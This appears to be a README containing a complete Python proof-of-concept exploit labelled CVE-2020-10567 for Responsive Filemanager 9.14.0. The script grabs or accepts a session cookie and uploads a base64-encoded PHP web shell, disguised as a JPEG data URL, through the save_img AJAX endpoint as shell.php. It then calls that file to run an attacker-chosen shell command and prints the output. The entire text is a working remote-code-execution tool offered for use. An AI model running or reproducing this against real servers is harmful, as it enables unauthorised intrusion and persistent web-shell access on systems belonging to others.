README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name : POC_CVE-2020-10567.py
# Author : Pierre_Adams
# Date created : 26/03/2026
import requests
import argparse
import base64
def parseArgs():
parser = argparse.ArgumentParser(
description="Exploit RESPONSIVE filemanager v.9.14.0 (not Main branche!!)"
)
parser.add_argument(
"-C",
"--cookie",
required=False,
help="Cookie"
)
parser.add_argument(
"-c",
"--command",
required=True,
help="Command to execute"
)
parser.add_argument(
"-u",
"--url",
required=True,
help="RESPONSIVE filemanager url"
)
return parser.parse_args()
args = parseArgs()
def payload_encode():
php_code = f"""<?php
$output = shell_exec('{args.command}');
echo "$output";
?>"""
encoded = base64.b64encode(php_code.encode('utf-8')).decode('utf-8')
return encoded
session = requests.Session()
if args.cookie :
phpsessid = f"{args.cookie}"
print ("[>] Cookie : " + phpsessid)
else :
print("[>] Cookie collecting ... ")
r = session.get(f"{args.url}/filemanager/dialog.php")
phpsessid = session.cookies.get("PHPSESSID")
if not phpsessid:
print("[>] Aucun cookie PHPSESSID trouvé.")
exit(1)
print(f"[>] Cookie collect : PHPSESSID={phpsessid}")
print("[>] Request POST Send")
headers = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": f"PHPSESSID={phpsessid}"
}
payload = payload_encode()
data = {
"url": "data:image/jpeg;base64,"+payload,
"path": "",
"name": "shell.php",
}
response = session.post(
f"{args.url}/filemanager/ajax_calls.php?action=save_img",
headers=headers,
data=data,
)
if response.status_code == 200:
print("[>] Payload send")
r = session.get(f"{args.url}/source/shell.php")
print("[>] Response:\n\n" + r.text)